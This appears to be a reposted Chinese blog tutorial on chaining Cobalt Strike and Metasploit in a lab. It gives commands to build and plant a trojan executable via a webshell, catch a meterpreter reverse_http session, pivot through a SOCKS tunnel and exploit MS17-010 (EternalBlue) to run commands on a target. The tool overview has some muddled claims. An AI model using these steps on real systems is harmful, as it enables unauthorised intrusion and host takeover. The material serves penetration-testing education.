在网络安全领域,MSF(Metasploit Framework)和CS(Cobalt Strike)是两个非常著名的渗透测试工具,它们被安全专家和渗透测试人员广泛使用来评估系统的安全性。以下是对这两个工具的扩充说明,以及它们如何被用于合法的网络安全实践中:
- Metasploit Framework (MSF):
- 一键提权:在渗透测试中,如果发现了一个漏洞可以被利用来获取更高级别的权限,MSF 提供了一个叫做“exploit”的模块,它可以帮助自动化提权过程。
- 一键开代理:MSF 可以设置一个SOCKS代理,用于拦截和修改HTTP和HTTPS流量,这对于测试Web应用程序的安全非常有用。
- 一键做隧道:MSF 允许创建SOCKS隧道,这可以帮助绕过防火墙或NAT设备,以便在受限网络环境中进行测试。
- 一键扫描:MSF 提供了一个叫做“db_nmap”的模块,它可以自动化扫描过程,识别目标系统上开放的端口和运行的服务。
- Cobalt Strike (CS):
- 一键提权:Cobalt Strike 提供了一个叫做“post-exploitation”的模块,它包含了针对各种漏洞的提权脚本,可以自动化提权过程。
- 一键开代理:Cobalt Strike 可以配置为一个代理服务器,允许你拦截和修改通过的HTTP/HTTPS流量。
- 一键做隧道:通过使用Cobalt Strike的端口转发功能,可以创建隧道来绕过网络限制,使得你可以访问通常无法访问的内部资源。
- 一键扫描:Cobalt Strike 集成了Nmap扫描功能,可以通过Cobalt Strike的GUI界面来执行Nmap扫描,快速识别目标主机的开放端口和服务。
在使用这些工具时,必须遵守法律法规和道德规范,确保你拥有明确的授权来进行渗透测试。未经授权使用这些工具可能违反法律,并可能导致严重的法律后果。
打开 kali 添加一张网卡
ping通
打开服务端
bash teamserver 192.168.111.130 123456
打开客户端
bash cobaltstrike.sh
Cobalt——》Listeners——》Add:
Attacks——》Packages——》Windows Executable (生成木马)
通过蚁剑把MSB.exe 上传到win 2007
MSB.exe #运行
回到kali查看,不上线的话,关掉kali防火墙试试:
/etc/init.d/ufw stop #关掉防火墙
再重新运行MSB.exe
上线:
右键——》Session——》Sleep——》1 ——》OK
右键——》Interact (进入)
#指令必须加上shell shell ipconfig #查看ip shell route print #收集路由信息 shell arp -a #收集arp信息 shell ping 192.168.52.141
msfconsole
使用握手:
use exploit/multi/handler #握手命令 set payload windows/meterpreter/ reverse_http #使用http连接 set lhost 192.168.111.130 #设置监听IP set lport 9999 #设置监听端口 exploit #开始监听
CS界面——》Cobalt Strike——》Listeners——》Add
MSF:
MSF连接成功
CS和MSF的区别:
优点:
CS: 图像化,容易上手
MSF: 插件多,提权方便,扫描方便
CS——》右键——》Plvoting——》SOCKSServer:
Launch
CS——》View——》Proxy Plvots
点击Tunnel:(复制框中的代码命令,复制到MSF)
隧道搭建成功。
在MSF中搜索已有的(永恒之蓝)漏洞
search ms17
use 3 show options
set rhosts 192.168.52.141 run
search ms17
use 3 show options set command whoami set rhosts 192.168.52.141 run
set command ipconfig run
完成主机控制。
原文始发于微信公众号(安全君呀):【渗透测试利器】CS 联动 MSF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论